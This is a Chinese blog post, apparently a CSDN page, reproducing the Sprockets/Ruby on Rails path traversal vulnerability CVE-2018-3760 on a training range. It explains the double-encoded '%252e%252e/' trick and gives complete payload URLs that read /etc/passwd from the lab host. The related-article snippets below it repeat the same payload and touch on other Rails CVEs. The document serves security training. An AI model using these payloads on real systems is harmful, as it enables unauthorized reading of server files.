Ruby On Rails漏洞复现(CVE-2018-3760) --目录穿越

最新推荐文章于 2024-07-19 08:37:17 发布
最新推荐文章于 2024-07-19 08:37:17 发布
阅读量309 收藏
点赞数
分类专栏: 墨者学院 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45158261/article/details/107706890
版权

01 背景介绍

Ruby On Rails是一个著名的Ruby Web开发框架,它在开发环境中使用Sprockets作为静态文件服务器。Sprockets是一个Ruby库,用于编译和分发静态资源文件。
Sprockets 3.7.1及之前版本中,存在一处因为二次解码导致的路径穿越漏洞,攻击者可以利用%252e%252e/来跨越到根目录,读取或执行目标服务器上任意文件。

02 影响版本

版本 <=Sprockets 3.7.1

03 利用方法

利用手法 %252e%252e/ 不断返回上级目录 (%252e%252e/ 是…的url编码)

04 靶场

在这里插入图片描述

1.用http://219.153.49.228:40057/assets/file:%2f%2f/etc/passwd尝试读取其存放密码的文件、但是发现etc/passwd不在允许的路径下,报错页面显示出了允许的路径
在这里插入图片描述
2.复制一段路径,然后跳转到根目录之后../../../../../etc/passwd但是需要二次编码,编码之后的url是http://http://219.153.49.228:40057/assets/file:%2f%2f//usr/src/blog/app/assets/images/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd
在这里插入图片描述

白鸽i
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2018-3760漏洞复现(任意文件读取)
千寻的博客
01-07 4080
CVE-2018-3760漏洞复现(任意文件读取) 0x00 漏洞介绍 Ruby On Rails是一个著名的Ruby Web开发框架,它使用链轮作为开发环境中的静态文件服务器。Sprockets是一个编译和分发静态资源文件的Ruby库。 在Ruby 3.7.1和更低版本中,存在由辅助解码引起的路径遍历漏洞。攻击者可以使用%252e%252e/访问根目录并读取或执行目标服务器上的任何文件。 0x...
Ruby On Rails 路径穿越漏洞CVE-2018-3760
Yale的博客
03-19 3042
Ruby On Rails 路径穿越漏洞CVE-2018-3760) 前言: 这个漏洞作为路径穿越的典型例子,比较经典,18年跟着文档分析了一遍,最近又重新理了一遍,捎带着写了一遍源码跟踪分析的过程,个人感觉整个跟入调用的思想还是比较清晰的,分析的过程写的比较详细,有兴趣的萌新们也可以跟着分析一遍。 背景: Sprockets中存在信息泄露漏洞。 受影响的版本:4.0.0.beta7及更低版本,...
Ruby On Rails 路径遍历漏洞CVE-2018-3760
最新发布
qq_23003811的博客
07-19 236
Ruby On Rails 是著名的 Ruby Web 开发框架,它在开发环境中使用 Sprockets 作为静态文件服务器。攻击者可以%252e%252e/用来访问根目录并读取或执行目标服务器上的任何文件,../第一次转码:%2E%2E/,因为%也要进行二次编码,第二次编码就是:%252e%252e/。1、/assets/file:%2f%2f/etc/passwd访问此路径,可得允许访问的路径白名单。2、构造payload访问,获取passwd文件。
Ruby On Rails漏洞复现第二题(CVE-2019-5418) --目录穿越
小白鸽
07-31 531
01 背景介绍 Ruby On Rails是一个著名的Ruby Web开发框架,它在开发环境中使用Sprockets作为静态文件服务器。Sprockets是一个Ruby库,用于编译和分发静态资源文件。 在控制器中通过render file形式来渲染应用之外的视图,且会根据用户传入的Accept头来确定文件具体位置。 通过传入Accept: …/…/…/…/…/…/…/…/etc/passwd{{ 头来构成构造路径穿越漏洞,读取任意文件。 ({{闭合模板路径) 02 影响版本 Rails全版本 其中修复版本
Ruby On Rails路径遍历漏洞 CVE-2018-3760 漏洞复现
ADummy的博客
03-01 525
Ruby On Rails路径遍历漏洞CVE-2018-3760) by ADummy 0x00利用路线 ​ 通过报错获取允许目录的列表—>通过允许的目录绕过访问任意文件 0x01漏洞介绍 ​ Ruby On Rails是一个著名的Ruby Web开发框架,它在开发环境中使用Sprockets作为静态文件服务器。Sprockets是一个Ruby库,用于编译和分发静态资源文件。 Sprockets 3.7.1及更低版本中的辅助解码导致路径穿越漏洞。攻击者可以%252e%252e/用来访问根目录
CVE-2018-1111:CVE-2018-1111 DynoRoot
05-18
CVE-2018-1111,被称为 DynoRoot,是一个针对 Ruby on Rails 应用程序的安全漏洞,该漏洞2018年被发现并公开。Ruby on Rails 是一个流行的开源 Web 开发框架,以其高效、简洁和灵活的代码结构深受开发者喜爱。然而...
CVE-2020-8163:CVE-2020-8163-在Rails中远程执行用户提供的本地名称的代码
03-09
5.0.1之前的Rails版本中存在一个漏洞,该漏洞将允许攻击者控制render调用的locals参数。 已为该漏洞分配了CVE标识符CVE-2020-8163。 受影响的版本:rails <5.0.1不受影响:不允许用户控制本地名称的应用程序。 ...
ruby-on-rails-mon-db:使用MongoDB的Ruby on Rails
02-04
Ruby on Rails与MongoDB 您可以在MongoDB的帮助下轻松... rails new ruby-on-rails-with-mongodb --skip-active-record从您的Gemfile中删除sqlite3(如果存在),将Mongoid添加到您的Gemfile中,然后运行“ bundle”。
rubynostrilhos:关于Ruby on Rails的博客(pt-br)
02-04
【标题】"rubynostrilhos:关于Ruby on Rails的博客(pt-br)"指出这是一个专注于Ruby on Rails技术的博客资源,主要面向葡萄牙语(pt-br)的读者。Ruby on Rails,通常简称为Rails,是一款基于Ruby语言的开源Web...
redis-railsRuby on Rails的Redis存储
02-02
Ruby on Rails的Redis商店 redis-railsRuby on Rails提供了一整套存储(缓存,会话, HTTP缓存)。 有关一般准则,请参见主要的。 关于Rails 5.2的快速说明 Rails 5.2.0用地,因此,如果您只需要将片段缓存存储在...
Vulhub - Ruby On Rails 路径穿越漏洞CVE-2018-3760复现
多崎巡礼的博客
10-30 3695
Ruby On Rails 路径穿越漏洞CVE-2018-3760Ruby On Rails在开发环境下使用Sprockets作为静态文件服务器,Ruby On Rails是著名Ruby Web开发框架,Sprockets是编译及分发静态资源文件的Ruby库。 Sprockets 3.7.1及之前版本中,存在一处因为二次解码导致的路径穿越漏洞,攻击者可以利用%252e%252e/来跨越到...
墨者靶场 Ruby On Rails漏洞复现第一题(CVE-2018-3760
曹振国的博客
06-09 536
Ruby On Rails介绍:解题方向:关于【CVE-2018-3760漏洞分析可以看这两篇文章:影响版本:漏洞复现:一、访问靶机地址二、当我们使用`/assets/file:///etc/passwd`访问,发现`//`会被过滤,尝试进行url编码三、访问`/assets/file:%2f%2f/etc/passwd`通过报错得到用户可以访问的路径四、进行二次编码进行读取,得到key值 介绍: Ruby On Rails是一个著名的Ruby Web开发框架,它在开发环境中使用Sprockets作为静态
【墨者靶场】---3、Ruby On Rails漏洞复现第一题(CVE-2018-3760
qq_43168364的博客
08-21 329
背景介绍 Ruby On Rails是一个著名的Ruby Web开发框架,它在开发环境中使用Sprockets作为静态文件服务器。Sprockets是一个Ruby库,用于编译和分发静态资源文件。 实训目标 1、学会根据漏洞编号查找漏洞详情; 2、了解Ruby On RailsCVE-2018-3760)形成原理; 3、学习Ruby On RailsCVE-2018-3760)利用方法; 解题方向 利用已知漏洞读取文件passwd 漏洞说明 Ruby On Rails在开发环境下使用Sprocket
Ruby On Rails漏洞复现第一题(CVE-2018-3760
weixin_44281516的博客
08-03 371
墨者靶场环境 漏洞poc http://219.153.49.228:46238/assets/file:%2f%2f/usr/src/blog/app/assets/images/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd 拿到key
CVE-2018-3760漏洞复现(墨者靶场)
2301_78136321的博客
12-06 155
这里用的是墨者靶场的环境1.打开环境可以看到出现这样的网页下面给出了提示,这里的漏洞Ruby的任意文件读取的漏洞
文件包含漏洞
jpygx123的博客
10-25 4041
文件包含漏洞 严格来说,文件包含漏洞是“代码注入”的一种,这种攻击其原理就是注入一段用户能控制的脚本或代码,并让服务端执行。 常见的导致文件包含(文件读取)的函数如下: PHP: include():使用此函数,只有代码执行到此函数时才将文件包含进来,发生错误时只警告并继续执行。 require():使用此函数,只要程序执行,立即调用此函数包含文件,发生错误时,会输出错误信息并立即终...
漏洞复现----14、Ruby On Rails 路径穿越漏洞CVE-2018-3760
七天
11-08 1277
文章目录一、Ruby on Rails 简介二、漏洞简介1、Sprockets简介三、漏洞复现 一、Ruby on Rails 简介 Ruby on Rails(官方简称为 Rails,亦被简称为 RoR),是一个使用 Ruby 语言写的开源 Web 应用框架,它是严格按照 MVC 结构开发的。它努力使自身保持简单,来使实际的应用开发时的代码更少,使用最少的配置。 Rails 的设计原则包括 “不做重复的事”(Don’t Repeat Yourself)和 “惯例优于设置”(Convention Ove
Ruby on Rails 教程(第3版-1.0.2)
"Ruby on Rails Tutorial(3rd-1.0.2)" 是一本针对初学者的详尽指南,由Michael Hartl撰写,涵盖了Ruby on Rails框架的基础到高级概念。本书内容包括多个章节,每个章节都专注于特定的技术或实践。 在第1章中,作者...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值